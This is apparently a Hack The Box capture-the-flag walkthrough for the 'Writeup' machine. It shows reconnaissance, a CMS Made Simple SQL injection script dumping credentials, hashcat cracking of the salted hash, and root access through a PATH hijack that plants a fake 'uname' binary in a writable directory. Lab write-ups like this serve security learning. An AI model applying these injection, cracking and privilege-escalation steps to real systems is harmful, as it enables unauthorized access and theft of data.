Writeup HTB Walkthrough

Writeup on hackthebox is an easy linux machine, through this walkthrough we’re going to see how to capture both user and root flags.

if you have any question or any detail to add, plase send me your thoughts here

1.Nmap result

22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u1 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))

After the scan is complete, we can see that we have port 80 open. so i decided to dirbust the website. don’t use dirsearch or gobuster commands you’ll be blocked because it contains a dirbusting protection, and you’ll have to reset the machine.

so let’s do it manually, first time with robots.txt, i got this result :

User-agent: * 
Disallow: /writeup/

so let’s access this route and enumerate the website found.

after checking the source code, we can see easily see the meta tag contaning the name o the CMS “CMS Made simple”

<meta name="Generator" content="CMS Made Simple - Copyright (C) 2004-2019. All rights reserved." />

2.Exploitation and user flag

Searching on Google for an exploit about CMS Made Simple, and then i found this python script that use SQL Injection.

$ python3 csm_made_simple_injection.py -u http://MACHINE_IP/writeup

[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bf

Great result ! we have the username “jkr” and the password with salt “62def4866937f08cc13bab43bf:5a599ef579066807” , now it’s time for hashcat command :

$ hashcat passhash  /usr/share/wordlists/rockyou.txt -m 20

62def4866937f08cc13bab43bb14e6f7:5a599ef579066807:raykayjay9

Done ! let’s move on and use those credentials to ssh and get our user flag from user.txt

3. Root flag

After working around and enumerate several directories and path for something intersting to help us with the root flag, i got some information to save for further exploitation :

first one is the user jkr and its groups :

$ id
uid=1000(jkr) gid=1000(jkr) groups=1000(jkr),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),50(staff),103(netdev)

i looked for any folders or files that could have some of this groups and i found this :

$ find / -group staff
/usr/local
/usr/local/bin
/usr/local/include
/usr/local/share
/usr/local/share/sgml
/usr/local/share/sgml/misc
/usr/local/share/sgml/stylesheet
/usr/local/share/sgml/entities
/usr/local/share/sgml/dtd
/usr/local/share/sgml/declaration
/usr/local/share/fonts
/usr/local/share/ca-certificates
/usr/local/share/man
/usr/local/share/emacs
/usr/local/share/emacs/site-lisp
/usr/local/share/xml
/usr/local/share/xml/schema
/usr/local/share/xml/misc
/usr/local/share/xml/entities
/usr/local/share/xml/declaration
/usr/local/games
/usr/local/man
/usr/local/src
/usr/local/etc
/usr/local/lib
/usr/local/lib/python3.5
/usr/local/lib/python3.5/dist-packages
/usr/local/lib/python2.7
/usr/local/lib/python2.7/dist-packages
/usr/local/lib/python2.7/site-packages
/usr/local/sbin

After that i managed to use pspy tool and monitor process on this machine.

We have some interesting result here by running pspy :

sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new    

here we can see that there is a process running by root and the /usr/local/sbin is given the highest priority.

Let’s check the content of the script /etc/update-motd.d :

$ cat /etc/update-motd.d/10-uname.
#!/bin/sh
uname -rnsom

this script call uname command, and using the previous logic as /usr/local/sbin comes in first priority and staff group can write on this folder, we can see if uname could be replaced by another command :

$ whereis uname
uname: /bin/uname /usr/share/man/man1/uname.1.gz

Great ! so let’s write our own uname command that copy the root flag and wait for the root process to execute :

$ echo -e '#!/bin/bash\ncat /root/root.txt > /home/jkr/root.txt' > /usr/local/bin/uname && chmod +x /usr/local/bin/uname

and it’s done, root flag is owned and the machine is done.